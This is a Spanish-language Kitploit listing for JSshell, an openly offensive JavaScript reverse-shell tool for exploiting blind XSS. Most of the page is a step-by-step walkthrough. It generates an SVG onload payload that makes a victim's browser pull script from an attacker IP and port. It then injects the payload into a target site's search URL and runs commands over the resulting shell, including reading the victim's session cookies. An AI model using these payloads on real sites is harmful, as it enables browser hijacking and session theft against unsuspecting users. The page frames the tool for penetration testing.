Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
JSshell — JSshell - shell inversa/remota de JavaScript | Kitploit
Herramientas/GitHubGitHub/shelld3v/jsshell
Generación de PayloadsExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubshelld3v/jsshell

JSshell

JSshell - shell inversa/remota de JavaScript

Ver Repositorio
6311102hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

JSshell - versión 3.1

JSshell

JSshell - un reverse shell de JavaScript. Se utiliza para ejecutar código JS de forma remota, explotar XSS ciego, ...

Requisitos: Cualquier sistema operativo + Python 2 o Python 3

Novedades en JSshell versión 3.1

Actualizado en la nueva versión de JSshell 3.1:

  • Nuevo comando de JSshell: snippet -> permite escribir un fragmento de código JavaScript
root@kitploit:~
>>> snippet
Use CTRL+D to finish the snippet

function new() {
    new = 'New update: Support javascript snippet =)';
    confirm(new)
}

new()
>>> 
  • Modo silencioso (para profesionales)
  • Se agregó payload de reverse shell <body>
  • Se corrigieron algunos errores

Uso

Generar payloads de reverse shell JS: -g

Establecer el número de puerto local para escuchar y generar payloads (Por defecto: 4848):

Descargar herramienta
-p

Establecer la dirección de origen local para generar payloads (Por defecto: detectar automáticamente tu dirección IP): -s

Establecer tiempo de espera para la conexión del shell (si el usuario sale de la sesión, el shell se pausará para siempre, por lo que si estableces el tiempo de espera, el shell se cerrará después de exceder el tiempo de espera): -w

Ejecutar un comando después de obtener el shell: -c

Ejemplos de uso:

  • jsh.py
  • jsh.py -g
  • jsh.py -p 1234
  • jsh.py -s 48.586.1.23 -g
  • jsh.py -c "alert(document.cookie)" -w 10

Un ejemplo de ejecución de JSshell:

Este es un ejemplo paso a paso de cómo usar JSshell.

Primero, necesitamos generar un payload de reverse shell JS y establecer el tiempo de espera del shell (por ejemplo, 20 segundos):

root@kitploit:~
~# whoami
root
~# ls
README.md   jsh.py
~# python3 jsh.py -g -w 20
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...

Ahora pega este payload en el sitio web:

https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>

Accede a la página y tendremos el reverse shell JS:

root@kitploit:~
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help                  This help
exit, quit            Exit the JS shell
$

Ejecutemos algunos comandos:

root@kitploit:~
$ var test = 'controlled'
$ confirm(test)
$

Y aparecerá una alerta: controlled

root@kitploit:~
$ prompt(document.cookie)
$

Y el navegador mostrará las cookies del usuario: JSESSION=3bda8...

root@kitploit:~
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#

¡Ahora salido!

Autor

Esto fue creado por shelld3v!